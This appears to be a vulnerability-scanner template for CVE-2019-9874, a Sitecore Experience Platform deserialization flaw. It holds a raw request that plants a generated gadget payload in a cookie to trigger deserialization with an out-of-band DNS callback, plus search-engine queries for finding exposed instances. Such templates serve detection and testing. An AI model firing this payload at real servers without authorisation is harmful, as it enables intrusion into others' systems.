id: CVE-2019-9874

info:
  name: Sitecore Experience Platform - Deserialization of Untrusted Data
  author: ritikchaddha
  severity: critical
  description: |
    Sitecore Experience Platform before 8.2 Update-7 and 9.0 before Update-2 contains a remote code execution vulnerability (CVE-2019-9874) caused by deserialization of untrusted data. An attacker can exploit this issue to execute arbitrary code on the affected system via a crafted request to the /sitecore/shell/Applications/Layouts/IDE.aspx endpoint.
  impact: |
    Attackers can execute arbitrary code remotely, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of Sitecore or apply the security patches addressing deserialization issues.
  reference:
    - https://www.synacktiv.com/ressources/advisories/Sitecore_CSRF_deserialize_RCE.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9874
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-9874
    epss-score: 0.87631
    epss-percentile: 0.99487
    cwe-id: CWE-502
    cpe: cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sitecore
    product: experience_platform
    shodan-query: http.html:"Sitecore Experience Platform"
    fofa-query: body="Sitecore Experience Platform"
  tags: cve,cve2019,sitecore,deserialization,rce,kev,vkev,vuln

http:
  - raw:
      - |
        POST /sitecore/shell/Applications/Security/CreateNewUser/CreateNewUser.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: __CSRFCOOKIE={{randstr}}; __CSRFTOKEN={{generate_java_gadget("dns", "https://{{interactsh-url}}", "base64")}}

    # The server deserializes the __CSRFTOKEN cookie; a vulnerable instance
    # fails with a 500 whose body mentions the CSRF exception and deserialization.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PotentialCsrfException"
          - "deserialization"
        condition: and
        case-insensitive: true

      - type: status
        status:
          - 500
# digest: 4a0a004730450220499585af59659aa5bc820098593949ba64bdf8989661fd1acc71ca3a8d4e3dc50221009a6d28b5506bcc72e7c9e92266fadc68bb0ae4ea21efd156f33b72a198675c21:922c64590222798bb761d5b6d8e72950